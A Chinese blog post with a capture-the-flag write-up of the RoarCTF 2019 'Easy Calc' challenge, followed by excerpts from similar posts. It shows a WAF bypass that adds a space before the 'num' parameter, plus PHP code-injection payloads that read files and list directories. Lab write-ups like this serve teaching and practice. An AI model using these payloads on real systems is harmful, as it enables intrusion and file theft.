[RoarCTF 2019]Easy Calc

最新推荐文章于 2025-02-08 11:37:33 发布
原创 最新推荐文章于 2025-02-08 11:37:33 发布 · 96 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全

本文探讨了HTTP协议走私及PHP字符串解析漏洞的利用方法。通过分析一个具体案例,展示了如何绕过WAF进行攻击尝试,并给出了具体的payload实现。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

考察知识点:http协议走私、php字符串解析漏洞

考了这些东西吗?

界面长这样:
在这里插入图片描述
使用了ajax,同时有一个calc.php文件。进去看看
在这里插入图片描述发现有黑名单筛选了部分转义字符,

在这里插入图片描述
构造?num=phpinfo(),然后被waf拦住了。

!waf :

Web应用防护系统(也称为:网站应用级入侵防御系统。英文:Web Application Firewall,简称: WAF)。利用国际上公认的一种说法:Web应用防火墙是通过执行一系列针对HTTP/HTTPS的安全策略来专门为Web应用提供保护的一款产品。

(摘自:百度百科)

在这里插入图片描述
waf的典型绕过,利用php解析
类似这种:

http://www.xxx.com/index.php?num = aaaa

payload:

calc.php? num=1;var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))
F1gh4
关注
[RoarCTF 2019]Easy Calc1
2301_77087492的博客
04-27 393
chr(47).chr(102).chr(49).chr(97).chr(103).chr(103):是/flagg的ascii码。:显示关于一个或多个表达式的结构信息,包括表达式的类型与值。7.又看了一眼前端代码,在payload中将num改成 num(前面加一个空格),再次尝试。5.可以看到这里给出了一个黑名单验证,过滤了一些字符,尝试构造payload。8.访问成功了,页面列出了一些目录和文件名信息,从中我们发现了f1agg。4.这里发现代码验证在前端提到了一个calc.php,访问一下看看。
BUUCTF [RoarCTF 2019]Easy Calc1
qq_35874748的博客
10-19 3177
一.打开题目后: 二.Ctrl+U查看源代码: 发现存在WAF和一个文件calc.php,这里我们就需要简单的了解下什么是WAF了: WAF的全称是(Web Application Firewall)即Web应用防火墙,简称WAF。 那么WAF能做什么? WAF可以过滤HTTP/HTTPS协议流量,防护Web攻击。 WAF可以对Web应用进行安全审计 WAF可以防止CC攻击 应用交付 CC攻击:通过大量请求对应用程序资源消耗最大的应用,如...
【[RoarCTF 2019]Easy Calc
qq_40646572的博客
05-05 222
信息搜集 打开目标页面,搜集下可用的信息。 在文本框随便输入了点字母,发现提示。 打开页面源码,发现了提示,有waf存在。并且发现数据发送到calc.php页面,参数是num。 打开calc.php页面发现源码。 http://node4.buuoj.cn:28614/calc.php? num=phpinfo() Num参数前加一个空格。 为什么要num参数前加一个空格,是因为加一个空格为了绕过waf,在请求传递到waf层的时候,waf会检测num变量,当num前面加一个空格时,目标变量会找.
RoarCTF 2019 Easy Calc
BlueDoorZz的博客
07-11 424
0x00 题目类型:php,RCE。 知识点:php对变量空格的解析。 0x01 查看源码,提醒有WAF保护,不过我们不知道规则。发现calc.php,对传入的num参数做了如下限制。 $str = $_GET['num']; $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]','\$','\\','\^']; foreach ($blacklist as $blackitem) {
2025.2.7——一、[RoarCTF 2019]Easy Calc 代码审计|WAF|PHP字符串解析特性
最新发布
2402_87387800的博客
02-08 911
题目来源:BUUCTF [RoarCTF 2019]Easy Calc
[RoarCTF 2019]Easy Calc 1
snowlyzz的博客
03-13 4250
写给自己看 方便理解。 查看源代码 看到了URL 试试访问calc.php 尝试给num传参:发现只能传数字 而不能传字母。而我们要读取的可能就是flag这个文件 那我们可以利用PHP的字符串解析特性来绕过WAF,在num前面加上空格 绕过num传参后,我们要读取他根目录下的文件。 也就是 calc.php? num=print_r(scandir('/')); 却发现他没有返回我们想要的答案 抓包看看 发现他把 ' ' 引号给过滤掉了 那就...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

F1gh4

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值